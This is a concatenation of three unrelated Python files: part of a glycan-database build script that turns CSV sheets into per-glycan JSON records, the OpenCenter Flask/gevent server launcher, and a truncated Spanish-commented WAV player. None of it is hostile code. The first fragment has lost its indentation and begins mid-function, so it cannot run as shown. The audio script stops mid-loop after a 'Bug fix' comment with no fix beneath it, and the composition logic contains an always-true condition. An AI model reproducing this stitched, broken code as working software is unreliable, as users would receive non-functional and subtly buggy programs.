main_dict["keywords"][main_id] = []
if kw not in main_dict["keywords"][main_id]:
main_dict["fully_determined"][main_id] = "yes"
main_dict["keywords"][main_id].append(kw)
#--> fully_determined
sheet_name = "fully_determined"
if file_name.find(sheet_name) != -1:
species = file_name.split("_")[0]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
main_dict["fully_determined"][main_id] = "yes"
kw = "fully_determined"
if main_id not in main_dict["keywords"]:
main_dict["keywords"][main_id] = []
if kw not in main_dict["keywords"][main_id]:
main_dict["keywords"][main_id].append(kw)
#--> sequences
sheet_name = "_sequences_"
if file_name.find(sheet_name) != -1:
species = file_name.split("_")[0]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
prop2field = {
"iupac":"sequence_iupac_extended",
"wurcs":"sequence_wurcs",
"glycoct":"sequence_glycoct",
"inchi":"sequence_inchi",
"smiles_isomeric":"sequence_smiles_isomeric",
"glycam":"sequence_glycam_iupac",
"byonic":"sequence_byonic",
"gwb":"sequence_gwb"
}
for main_id in data_frame["data"]:
tmp_row = data_frame["data"][main_id][0]
for p in prop2field:
field = prop2field[p]
if field in tmp_fl:
main_dict[p][main_id] = tmp_row[tmp_fl.index(field)]
combo_list = ["glytoucan_ac", field]
update_record_stat(record_stat, file_name, p, 1,combo_list)
if field == "sequence_inchi":
inchi_key = tmp_row[tmp_fl.index("inchi_key")]
url = map_dict["xrefkey2url"]["glycan_xref_inchi_key"][0]
url = url % (inchi_key)
o = {"key":inchi_key, "url":url}
main_dict["inchi_key"][main_id] = o
combo_list = ["glytoucan_ac", field]
update_record_stat(record_stat, file_name, "inchi_key", 1, combo_list)
#--> species
for sheet_name in ["glycan_species"]:
if file_name.find(sheet_name) != -1:
prop_name = "species"
prop_dict = {"taxid":"tax_id", "name":"tax_name", "annotation_category":"annotation_category"}
xref_info = ["xref_key", "xref_id"]
combo_flist_one = ["tax_id", "annotation_category"]
combo_flist_two = ["xref_key", "xref_id"]
load_obj = main_dict[prop_name]
n = load_property_objlist(load_obj,in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "glytoucan_ac")
combo_list = ["glytoucan_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
for combo_id in load_obj:
if combo_id == "seen":
continue
main_id, tax_id,ann_cat = combo_id.split("|")
if load_obj[combo_id]["annotation_category"] not in ["Direct","Subsumption"]:
load_obj[combo_id]["deleteflag"] = True
#load_obj[combo_id].pop("annotation_category")
if load_obj[combo_id]["taxid"] == "":
load_obj[combo_id]["taxid"] = -1
else:
common_name = species_obj[load_obj[combo_id]["taxid"]]["common_name"]
if common_name != "":
load_obj[combo_id]["common_name"] = common_name
load_obj[combo_id]["taxid"] = int(load_obj[combo_id]["taxid"])
#--> interactions
for sheet_name in ["protein_matrixdb"]:
if file_name.find(sheet_name) != -1:
species = file_name.split("_")[0]
prop_name = "interactions"
prop_dict = {"interactor_id":"uniprotkb_canonical_ac"}
xref_info = ["xref_key", "xref_id"]
combo_flist_one = ["uniprotkb_canonical_ac"]
combo_flist_two = ["xref_key", "xref_id"]
load_obj = main_dict[prop_name]
n = load_property_objlist(load_obj,in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "saccharide")
combo_list = ["uniprotkb_canonical_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
for combo_id in load_obj:
if combo_id == "seen":
continue
if combo_id.split("|")[1] == "":
load_obj[combo_id]["deleteflag"] = True
canon = combo_id.split("|")[1]
rec_name = ""
if canon in protein_obj_dict:
rec_name = get_protein_info(protein_obj_dict[canon], "recommendedname")
load_obj[combo_id]["interactor_type"] = "protein"
load_obj[combo_id]["interactor_name"] = rec_name
#--> publication
for sheet_name in ["glycan_citations_", "_proteoform_citations_"]:
if file_name.find(sheet_name) != -1:
species = file_name.split("_")[0]
prop_name = "publication"
prop_dict = {"title":"title",
"journal":"journal_name","date":"publication_date","authors":"authors"}
xref_info = ["src_xref_key", "src_xref_id"]
combo_flist_one = ["xref_key", "xref_id"]
combo_flist_two = ["src_xref_key", "src_xref_id"]
load_obj = main_dict[prop_name]
n = load_property_objlist(load_obj,in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "glytoucan_ac")
combo_list = ["glytoucan_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
for combo_id in load_obj:
if combo_id == "seen":
continue
main_id, xref_key, xref_id = combo_id.split("|")
xref_url = map_dict["xrefkey2url"][xref_key][0] % (xref_id)
load_obj[combo_id]["date"] = load_obj[combo_id]["date"].split(" ")[0]
xref_badge = map_dict["xrefkey2badge"][xref_key]
load_obj[combo_id]["reference"] = [
{
"type":xref_badge,
"id":xref_id,
"url":xref_url
}
]
#--> motifs
for sheet_name in ["glycan_motif"]:
if file_name.find(sheet_name) != -1:
prop_name = "motifs"
load_obj = main_dict[prop_name]
prop_dict = {"id":"motif_ac", "name":"motif_name", "synonym":"alternative_name",
"keywords":"keyword"}
combo_flist_one = ["motif_ac"]
xref_info = []
combo_flist_two = []
n = load_property_objlist(load_obj, in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "glytoucan_ac")
combo_list = ["glytoucan_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
#--> glycoprotein
for sheet_name in ["proteoform_glycosylation_sites"]:
if file_name.find(sheet_name) != -1:
prop_name = "glycoprotein"
load_obj = main_dict[prop_name]
prop_dict = {"uniprot_canonical_ac":"uniprotkb_canonical_ac",
"start_pos":"glycosylation_site_uniprotkb",
"end_pos":"glycosylation_site_uniprotkb",
"residue":"amino_acid"
}
combo_flist_one = ["uniprotkb_canonical_ac", "glycosylation_site_uniprotkb"]
xref_info = ["xref_key", "xref_id"]
combo_flist_two = ["xref_key", "xref_id"]
if file_name.find("proteoform_glycosylation_sites_gptwiki") != -1:
xref_info = ["glycan_xref_key", "glycan_xref_id"]
combo_flist_two = ["glycan_xref_key", "glycan_xref_id"]
n = load_property_objlist(load_obj, in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "saccharide")
combo_list = ["glytoucan_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
for combo_id in load_obj:
if combo_id == "seen":
continue
main_id, canon, aa_pos = combo_id.split("|")[:3]
if aa_pos.strip() == "":
if "start_pos" in load_obj[combo_id]:
load_obj[combo_id].pop("start_pos")
load_obj[combo_id].pop("end_pos")
load_obj[combo_id].pop("residue")
protein_obj = protein_obj_dict[canon]
if protein_obj == {}:
load_obj[combo_id]["deleteflag"] = True
continue
gene_name = get_protein_info(protein_obj, "gene_name")
rec_name = get_protein_info(protein_obj, "recommendedname")
tax_id = get_protein_info(protein_obj, "tax_id")
tax_name = get_protein_info(protein_obj, "tax_name")
load_obj[combo_id]["protein_name"] = rec_name
load_obj[combo_id]["gene_name"] = gene_name
load_obj[combo_id]["tax_id"] = tax_id
load_obj[combo_id]["tax_name"] = tax_name
if "start_pos" in load_obj[combo_id]:
s_pos_list = str(load_obj[combo_id]["start_pos"]).split("|")
e_pos_list = str(load_obj[combo_id]["end_pos"]).split("|")
load_obj[combo_id]["start_pos"] = int(s_pos_list[0])
load_obj[combo_id]["end_pos"] = int(e_pos_list[0])
if len(s_pos_list) > 1:
load_obj[combo_id]["alternate_start_pos_list"] = []
for p in s_pos_list[1:]:
load_obj[combo_id]["alternate_start_pos_list"].append(int(p))
if len(e_pos_list) > 1:
load_obj[combo_id]["alternate_end_pos_list"] = []
for p in e_pos_list[1:]:
load_obj[combo_id]["alternate_end_pos_list"].append(int(p))
if "residue" in load_obj[combo_id]:
r_list = load_obj[combo_id]["residue"].split("|")
load_obj[combo_id]["residue"] = r_list[0]
if len(r_list) > 1:
load_obj[combo_id]["alternate_residue_list"] = s_pos_list[1:]
#--> names
for sheet_name in ["glycan_names"]:
if file_name.find(sheet_name) != -1:
prop_name = "names"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
for tmp_row in data_frame["data"][main_id]:
name = tmp_row[tmp_fl.index("glycan_name")]
domain = tmp_row[tmp_fl.index("glycan_name_domain")]
combo_id = "%s|%s|%s" % (main_id, name, domain)
load_obj[combo_id] = {"name":name, "domain":domain}
#if domain.lower() == "byonic":
# main_dict["byonic"][main_id] = name
#--> subsumption
for sheet_name in ["glycan_subsumption"]:
if file_name.find(sheet_name) != -1:
prop_name = "subsumption"
rs_dict = {
"ancestor":1,"basecomposition":1, "composition":1,"descendant":1,
"fullydetermined":1,"subsumedby":1,"subsumes":1,"topology":1,"leaf":1
}
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
for tmp_row in data_frame["data"][main_id]:
related_accession = tmp_row[tmp_fl.index("related_accession")]
relationship = tmp_row[tmp_fl.index("relationship")].lower()
if relationship in rs_dict:
combo_id = "%s|%s|%s" % (main_id, related_accession,relationship)
o = {"related_accession":related_accession,"relationship":relationship}
load_obj[combo_id] = o
#glytoucan_type = tmp_row[tmp_fl.index("glytoucan_type")].lower()
#gt_list = ["topology", "composition", "basecomposition"]
#rl_list = ["ancestor", "descendant"]
#cond_one = main_id != related_accession
#cond_two = glytoucan_type == relationship
#cond_three = glytoucan_type in gt_list
#if cond_one and cond_two and cond_three:
# combo_id = "%s|%s|%s" % (main_id, related_accession,relationship)
# rl = ""
# if main_id in heirarchy_dict:
# if related_accession in heirarchy_dict[main_id]:
# rl = heirarchy_dict[main_id][related_accession]
# load_obj[combo_id] = {
# "id":related_accession,
# "type":glytoucan_type,
# "relationship":rl
# }
#--> residues
for sheet_name in ["glycan_enzyme"]:
if file_name.find(sheet_name) != -1:
prop_name = "residues"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
r_count = 1
for tmp_row in data_frame["data"][main_id]:
canon = tmp_row[tmp_fl.index("uniprotkb_canonical_ac")]
residue_id = tmp_row[tmp_fl.index("residue_id")]
residue_name = tmp_row[tmp_fl.index("residue_name")]
parent_residue_id = tmp_row[tmp_fl.index("parent_residue_id")]
attached_by = "rxn.%s" % (canon)
detached_by = ""
r = {"id":residue_id, "name":residue_name,
"attachedby":attached_by,
"detachedby":detached_by, "parentid":parent_residue_id}
combo_id = "%s|%s" % (main_id, r_count)
load_obj[combo_id] = r
r_count += 1
combo_list = ["glytoucan_ac", "residue_count"]
update_record_stat(record_stat, file_name, prop_name, len(load_obj.keys()), combo_list)
#--> enzyme
for sheet_name in ["glycan_enzyme"]:
if file_name.find(sheet_name) != -1:
prop_name = "enzyme"
load_obj = main_dict[prop_name]
prop_dict = {"uniprot_canonical_ac":"uniprotkb_canonical_ac"}
combo_flist_one = ["uniprotkb_canonical_ac"]
xref_info = []
combo_flist_two = []
n = load_property_objlist(load_obj, in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "glytoucan_ac")
combo_list = ["glytoucan_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
for combo_id in load_obj:
if combo_id == "seen":
continue
main_id, canon = combo_id.split("|")
protein_obj = protein_obj_dict[canon]
if protein_obj == {}:
continue
gene_name = get_protein_info(protein_obj, "gene_name")
rec_name = get_protein_info(protein_obj, "recommendedname")
gene_url = get_protein_info(protein_obj, "gene_url")
enzyme_tax_id = get_protein_info(protein_obj, "tax_id")
enzyme_tax_name = get_protein_info(protein_obj, "tax_name")
enzyme_tax_common_name = get_protein_info(protein_obj, "tax_common_name")
load_obj[combo_id]["protein_name"] = rec_name
load_obj[combo_id]["gene"] = gene_name
load_obj[combo_id]["gene_link"] = gene_url
load_obj[combo_id]["tax_id"] = enzyme_tax_id
load_obj[combo_id]["tax_name"] = enzyme_tax_name
load_obj[combo_id]["tax_common_name"] = enzyme_tax_common_name
xref_key = tmp_row[tmp_fl.index("xref_key")]
xref_id = tmp_row[tmp_fl.index("xref_id")]
xref_badge = map_dict["xrefkey2badge"][xref_key][0]
xref_url = map_dict["xrefkey2url"][xref_key][0] % (xref_id)
ev_obj = {"id":xref_id, "database":xref_badge, "url":xref_url}
load_obj[combo_id]["evidence"] = [ev_obj]
#--> dictionary
for sheet_name in ["glycan_dictionary"]:
if file_name.find(sheet_name) != -1:
prop_name = "dictionary"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
for tmp_row in data_frame["data"][main_id]:
o = {}
for f in tmp_fl:
if f in ["xref_id", "xref_key"]:
continue
o[f] = tmp_row[tmp_fl.index(f)]
o["synonymns"] = o["synonymns"].split("|")
xref_id = tmp_row[tmp_fl.index("xref_id")]
xref_key = tmp_row[tmp_fl.index("xref_key")]
xref_badge = map_dict["xrefkey2badge"][xref_key][0]
xref_url = map_dict["xrefkey2url"][xref_key][0] % (xref_id)
o["evidence"] = [{"id":xref_id, "url":xref_url, "database":xref_badge}]
combo_id = "%s|%s|%s" % (main_id, xref_id, o["term"])
load_obj[combo_id] = o
#--> glycotree_pathways
for sheet_name in ["glycan_pathway_glycotree"]:
if file_name.find(sheet_name) != -1:
prop_name = "glycotree_pathways"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
for tmp_row in data_frame["data"][main_id]:
val_dict = {}
for f in tmp_fl:
val_dict[f] = tmp_row[tmp_fl.index(f)]
o = {
"source":val_dict["source"],
"target":val_dict["target"],
"residue_affected": {
"id": val_dict["residue_id"],
"full_name": val_dict["residue_name"]
},
"enzymes":[]
}
combo_id = "%s|%s|%s" % (main_id, val_dict["source"], val_dict["target"])
load_obj[combo_id] = o
ac, tax_name = val_dict["enzyme_uniprotkb_ac"], val_dict["enzyme_tax_name"]
if ac != "":
oo = {"uniprotkb_ac":ac,"tax_name":tax_name}
load_obj[combo_id]["enzymes"].append(oo)
#--> crossref
for sheet_name in ["glycan_xref_"]:
if file_name.find(sheet_name) != -1:
prop_name = "crossref"
load_obj = main_dict[prop_name]
prop_dict = {"id":"xref_id"}
combo_flist_one = ["xref_key", "xref_id"]
xref_info = []
combo_flist_two = []
n = load_property_objlist(load_obj, in_file, prop_dict,xref_info,
combo_flist_one, combo_flist_two, "glytoucan_ac")
combo_list = ["glytoucan_ac"] + combo_flist_one
update_record_stat(record_stat, file_name, prop_name, n, combo_list)
for combo_id in load_obj:
if combo_id == "seen":
continue
main_id = combo_id.split("|")[0]
uniprotkb_ac = main_id.split("-")[0]
xref_key, xref_id = combo_id.split("|")[-2], combo_id.split("|")[-1]
xref_badge = map_dict["xrefkey2badge"][xref_key][0]
xref_url = map_dict["xrefkey2url"][xref_key][0]
if xref_url.find("%s") != -1:
xref_url = xref_url % (xref_id)
load_obj[combo_id]["url"] = xref_url
load_obj[combo_id]["database"] = xref_badge
#--> expression
seen_evdn = {}
for sheet_name in ["proteoform_glycosylation_sites_glyconnect",
"proteoform_glycosylation_sites_unicarbkb"]:
if file_name.find(sheet_name) != -1:
prop_name = "expression"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "saccharide")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
for tmp_row in data_frame["data"][main_id]:
if main_id == "":
continue
canon = tmp_row[tmp_fl.index("uniprotkb_canonical_ac")]
tmp_aa_pos = tmp_row[tmp_fl.index("glycosylation_site_uniprotkb")]
tmp_aa_three = tmp_row[tmp_fl.index("amino_acid")]
aa_pos_list = tmp_aa_pos.split("|")
aa_three_list = tmp_aa_three.split("|")
aa_pos = aa_pos_list[0]
aa_three = aa_three_list[0]
if aa_pos == "":
continue
abundance, tissue_name, uberon_id = "", "", ""
if "source_tissue_uberon_id" in tmp_fl:
tissue_name = tmp_row[tmp_fl.index("source_tissue_name")]
uberon_id = tmp_row[tmp_fl.index("source_tissue_uberon_id")]
if "abundance" in tmp_fl:
abundance = tmp_row[tmp_fl.index("abundance")]
cl_name, cl_id = "", ""
if "source_cell_line_cellosaurus_id" in tmp_fl:
cl_name = tmp_row[tmp_fl.index("source_cell_line_name")]
cl_id = tmp_row[tmp_fl.index("source_cell_line_cellosaurus_id")]
if "cellosaurus_id" in tmp_fl:
cl_name = tmp_row[tmp_fl.index("cellosuaurus_cell_line_name")]
cl_id = tmp_row[tmp_fl.index("cellosaurus_id")]
src_xref_key = tmp_row[tmp_fl.index("src_xref_key")]
src_xref_id = tmp_row[tmp_fl.index("src_xref_id")]
if src_xref_key == "protein_xref_glyconnect":
src_xref_key = "glycan_xref_glyconnect"
src_xref_id = tmp_row[tmp_fl.index("structure_id")]
src_xref_badge = map_dict["xrefkey2badge"][src_xref_key][0]
src_xref_url = map_dict["xrefkey2url"][src_xref_key][0] % (src_xref_id)
xref_key = tmp_row[tmp_fl.index("xref_key")]
xref_id = tmp_row[tmp_fl.index("xref_id")]
xref_badge = map_dict["xrefkey2badge"][xref_key][0]
xref_url = map_dict["xrefkey2url"][xref_key][0] % (xref_id)
combo_id = "%s|%s|%s|%s|%s" % (main_id,canon,aa_pos,uberon_id,abundance)
if combo_id not in load_obj["seen"]:
print ("Robel", combo_id)
cl_key = "glycan_xref_cellosaurus"
cl_url = map_dict["xrefkey2url"][cl_key][0] % (cl_id)
cl_obj = {"name": cl_name,"cellosaurus_id":cl_id,"url":cl_url}
cl_obj = cl_obj if cl_id not in ["", "0"] else {}
uberon_key = "glycan_xref_uberon"
uberon_url = map_dict["xrefkey2url"][uberon_key][0] % (uberon_id)
tissue_obj = {
"name":tissue_name,
"uberon":uberon_id.replace("UBERON_",""),
"url":uberon_url
}
tissue_obj = tissue_obj if uberon_id != "" else {}
load_obj[combo_id] = {
"uniprot_canonical_ac":canon,
"start_pos":int(aa_pos),
"end_pos":int(aa_pos),
"residue":aa_three,
"tissue":tissue_obj,
"cell_line":cl_obj,
"abundance":abundance,
"evidence":[
{"id":src_xref_id, "database":src_xref_badge,
"url":src_xref_url}
]
}
if len(aa_pos_list) > 1:
load_obj[combo_id]["alternate_start_pos_list"] = []
load_obj[combo_id]["alternate_end_pos_list"] = []
for tmp_aa_pos in aa_pos_list[1:]:
p = int(tmp_aa_pos)
load_obj[combo_id]["alternate_start_pos_list"].append(p)
load_obj[combo_id]["alternate_end_pos_list"].append(p)
if len(aa_three_list) > 1:
load_obj[combo_id]["alternate_residue"] = aa_three_list[1:]
load_obj["seen"][combo_id] = True
evdn_combo = "%s|%s|%s|%s|%s|%s"%(main_id,canon,aa_pos,uberon_id,src_xref_key,src_xref_id)
load_obj["seen"][evdn_combo] = True
evdn_row_list = [
[src_xref_key,src_xref_id],
[xref_key,xref_id]
]
for evdn_row in evdn_row_list:
x_key, x_id = evdn_row[0], evdn_row[1]
x_badge = map_dict["xrefkey2badge"][x_key][0]
x_url = map_dict["xrefkey2url"][x_key][0] % (x_id)
evdn_combo = "%s|%s|%s|%s|%s|%s"%(main_id,canon,aa_pos,uberon_id,x_key,x_id)
if evdn_combo not in load_obj["seen"]:
ev_obj = {"id":x_id, "database":x_badge, "url":x_url}
load_obj[combo_id]["evidence"].append(ev_obj)
load_obj["seen"][evdn_combo] = True
#--> composition (both composition and composition_advanced used advanced dataset)
for sheet_name in ["glycan_monosaccharide_composition_advanced"]:
if file_name.find(sheet_name) != -1:
prop_name = "composition_expanded"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
type_combo_list = []
for tmp_row in data_frame["data"][main_id]:
for residue in map_dict["residue2name"]:
if residue not in tmp_fl:
continue
n = int(tmp_row[tmp_fl.index(residue)])
name = map_dict["residue2name"][residue][0]
cid = map_dict["residue2cid"][residue][0]
residue = "other" if residue.lower() == "xxx" else residue.lower()
o = {"name":name, "residue":residue, "count":n}
if cid != "" and cid != "0":
url = map_dict["xrefkey2url"]["glycan_xref_monosaccharide_residue_name"][0] % (cid)
o = {"name":name, "residue":residue, "count":n, "cid":cid, "url":url}
combo_id = "%s|%s|%s" % (main_id, residue, cid)
load_obj[combo_id] = o
combo_list = ["glytoucan_ac", "residue"]
update_record_stat(record_stat, file_name, prop_name, len(load_obj.keys()), combo_list)
#--> composition_advanced
for sheet_name in ["glycan_monosaccharide_composition_advanced"]:
if file_name.find(sheet_name) != -1:
prop_name = "composition"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
type_combo_list = []
for tmp_row in data_frame["data"][main_id]:
class_count = {}
for residue in map_dict["residue2name"]:
if residue not in tmp_fl:
continue
#consider only top level residues
if residue not in residue_heirarchy:
continue
r_class = residue
n = int(tmp_row[tmp_fl.index(residue)])
class_count[r_class] = n
for r_class in class_count:
n = class_count[r_class]
r_class_name = map_dict["residue2name"][r_class][0]
cid = map_dict["residue2cid"][r_class][0]
r_class = "other" if r_class.lower() == "xxx" else r_class.lower()
o = {"name":r_class_name, "residue":r_class, "count":n}
if cid != "" or cid != "0":
url = map_dict["xrefkey2url"]["glycan_xref_monosaccharide_residue_name"][0] % (cid)
o = {"name":r_class_name, "residue":r_class, "count":n, "cid":cid, "url":url}
combo_id = "%s|%s|%s" % (main_id, r_class, cid)
load_obj[combo_id] = o
combo_list = ["glytoucan_ac", "residue"]
update_record_stat(record_stat, file_name, prop_name, len(load_obj.keys()), combo_list)
#--> classification
for sheet_name in ["glycan_classification"]:
if file_name.find(sheet_name) != -1:
prop_name = "classification"
load_obj = main_dict[prop_name]
data_frame = {}
libgly.load_sheet_as_dict(data_frame, in_file, ",", "glytoucan_ac")
tmp_fl = data_frame["fields"]
for main_id in data_frame["data"]:
type_combo_list = []
for tmp_row in data_frame["data"][main_id]:
g_type = tmp_row[tmp_fl.index("glycan_type")].strip()
g_subtype = tmp_row[tmp_fl.index("glycan_subtype")].strip()
g_type = "Other" if g_type == "" else g_type
g_subtype = "Other" if g_subtype == "" else g_subtype
type_combo_list.append("%s|%s" % (g_type, g_subtype))
type_combo_list = sorted(set(type_combo_list))
if len(type_combo_list) == 1:
glycan_type, glycan_subtype = type_combo_list[0].split("|")
t_tag = map_dict["subtypetags"][glycan_type][0] if glycan_type in map_dict["subtypetags"] else "xxx"
type_url = map_dict["xrefkey2url"]["glycan_xref_glycan_type"][0] % (t_tag)
o = {"type":{"name":glycan_type, "url":type_url}}
if t_tag == "xxx":
o["type"].pop("url")
if glycan_subtype != "no subtype":
s_tag = map_dict["subtypetags"][glycan_subtype][0] if glycan_subtype in map_dict["subtypetags"] else "xxx"
subtype_url = map_dict["xrefkey2url"]["glycan_xref_glycan_type"][0] % (s_tag)
o["subtype"] = {"name":glycan_subtype, "url":subtype_url}
if s_tag == "xxx":
o["subtype"].pop("url")
combo_id = "%s|%s|%s" % (main_id, glycan_type, glycan_subtype)
load_obj[combo_id] = o
else:
for type_combo in type_combo_list:
glycan_type, glycan_subtype = type_combo.split("|")
if glycan_subtype == "no subtype":
continue
t_tag = map_dict["subtypetags"][glycan_type][0] if glycan_type in map_dict["subtypetags"] else "xxx"
type_url = map_dict["xrefkey2url"]["glycan_xref_glycan_type"][0] % (t_tag)
s_tag = map_dict["subtypetags"][glycan_subtype][0] if glycan_subtype in map_dict["subtypetags"] else "xxx"
subtype_url = map_dict["xrefkey2url"]["glycan_xref_glycan_type"][0] % (s_tag)
o = {
"type":{"name":glycan_type, "url":type_url}
,"subtype":{"name":glycan_subtype, "url":subtype_url}
}
if t_tag == "xxx":
o["type"].pop("url")
if s_tag == "xxx":
o["subtype"].pop("url")
combo_id = "%s|%s|%s" % (main_id, glycan_type, glycan_subtype)
load_obj[combo_id] = o
combo_list = ["glytoucan_ac", "glycan_type", "glycan_subtype"]
update_record_stat(record_stat, file_name, prop_name, len(load_obj.keys()), combo_list)
tmp_dict = {}
for main_id in main_dict["glytoucan_ac"]:
tmp_dict[main_id] = {}
for sec in sec_info:
if sec_info[sec]["category"] in ["string"]:
tmp_dict[main_id][sec] = ""
elif sec_info[sec]["category"] in ["float"]:
tmp_dict[main_id][sec] = 0.0
elif sec_info[sec]["category"] in ["int"]:
tmp_dict[main_id][sec] = 0
elif sec_info[sec]["category"] in ["obj"]:
tmp_dict[main_id][sec] = {}
elif sec_info[sec]["category"] in ["list", "objlist"]:
tmp_dict[main_id][sec] = []
for sec in main_dict:
if type(main_dict[sec]) is dict:
if "seen" in main_dict[sec]:
main_dict[sec].pop("seen")
for combo_id in main_dict[sec]:
main_id = combo_id.split("|")[0]
if main_id not in tmp_dict:
continue
if sec_info[sec]["category"] in ["string", "int", "float", "list", "obj"]:
tmp_dict[main_id][sec] = main_dict[sec][combo_id]
elif sec_info[sec]["category"] in ["objlist"]:
o = main_dict[sec][combo_id]
if "deleteflag" not in o:
tmp_dict[main_id][sec].append(o)
record_count = 0
for main_id in tmp_dict:
if main_id == "seen":
continue
#if main_id in motif_glytoucan_ac_list:
# continue
out_file = path_obj["jsondbpath"] + "/glycandb/%s.json" % (main_id)
obj = tmp_dict[main_id]
if obj["classification"] == []:
o = {"type":{"name":"Other", "url":""}, "subtype":{"name":"Other", "url":""}}
obj["classification"] = [o]
for k in ["mass", "mass_pme", "number_monosaccharides"]:
if obj[k] == 0.0 or obj[k] == 0:
obj.pop(k)
obj["tool_support"] = {"gnome":"no","sandbox":"no"}
if "mass" in obj:
obj["tool_support"]["gnome"] = "yes"
for xobj in obj["crossref"]:
if xobj["database"] == "SandBox":
obj["tool_support"]["sandbox"] = "yes"
break
with open(out_file, "w") as FW:
FW.write("%s\n" % (json.dumps(obj, indent=4)))
record_count += 1
print ("make-glycandb: final filtered in: %s glycan objects" % (record_count))
out_file = path_obj["jsondbpath"] + "/logs/glycandb.json"
with open(out_file, "w") as FW:
FW.write("%s\n" % (json.dumps(record_stat, indent=4)))
# Script entry point: build the per-glycan JSON documents and stat logs.
if __name__ == '__main__':
    main()
|
#!/usr/bin/env python
#
# Copyright 2012, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from flask import request
from gevent.pywsgi import WSGIServer
from opencenter.db.database import init_db
from opencenter.webapp import WebServer
from opencenter.webapp.auth import is_allowed, authenticate
def main():
    """Start the OpenCenter web service.

    Builds the Flask-based WebServer, registers CORS and authentication
    hooks, initialises the database, and serves forever via gevent's
    WSGIServer (TLS-enabled when key/cert files are configured).
    """
    server = WebServer("opencenter",
                       argv=sys.argv[1:],
                       configfile='local.conf',
                       debug=True)

    @server.after_request
    def allow_cors(response):
        # Echo back the Origin header only when it is explicitly
        # whitelisted in the 'cors_uri' config entry.
        if 'cors_uri' in server.config and \
           'Origin' in request.headers and \
           request.headers['Origin'] in server.config['cors_uri']:
            response.headers['Access-Control-Allow-Origin'] = \
                request.headers['Origin']
            response.headers['Access-Control-Allow-Methods'] = \
                'HEAD,GET,PUT,POST,OPTIONS,DELETE'
            response.headers['Access-Control-Allow-Headers'] = \
                'Content-Type'
        return response

    @server.before_request
    def auth_f():
        # Challenge the client unless the request is authorised.
        if not is_allowed(roles=None):
            return authenticate()

    init_db(server.config['database_uri'])
    if 'key_file' in server.config and 'cert_file' in server.config:
        # HTTPS mode: client-certificate verification is OPTIONAL only
        # when a CA certificate is configured, otherwise none is done.
        import ssl
        verification = ssl.CERT_NONE
        ca_certs = None
        if 'ca_cert' in server.config:
            ca_certs = [server.config['ca_cert']]
            verification = ssl.CERT_OPTIONAL
        http_server = WSGIServer(
            (server.config['bind_address'], int(server.config['bind_port'])),
            server,
            keyfile=server.config['key_file'],
            certfile=server.config['cert_file'],
            cert_reqs=verification,
            ca_certs=ca_certs)
    else:
        # Plain HTTP.
        http_server = WSGIServer((server.config['bind_address'],
                                  int(server.config['bind_port'])), server)
    http_server.serve_forever()
|
"""
- Reproductor de audio con parametros automaticos
- Seminario de Computacion
- Semana Tecnologica
- Alvaro Araujo
"""
import pyaudio
import wave
import sys
import os
import numpy as np
# Playback parameters.  NOTE(review): _format/_channels/_rate are declared
# but the stream below derives everything from the WAV header instead —
# they are kept only for reference.
_format = pyaudio.paInt16
_channels = 2
_rate = 44100
_chunk = 2048
max_v = 2**16      # full range of a signed 16-bit sample (peak-to-peak)
lon_bar = 60       # width of each VU-meter bar in characters

if len(sys.argv) < 2:
    print("Syntax: %s entrada.wav" % sys.argv[0])
    sys.exit(-1)

wf = wave.open(sys.argv[1], 'rb')
audio = pyaudio.PyAudio()
stream = audio.open(format=audio.get_format_from_width(wf.getsampwidth()),
                    channels=wf.getnchannels(),
                    rate=wf.getframerate(),
                    output=True)

os.system("clear")
data = wf.readframes(_chunk)
while len(data) > 0:
    stream.write(data)
    # Bug fix: np.fromstring is deprecated (and removed in recent NumPy
    # releases) for binary input; np.frombuffer is the drop-in replacement
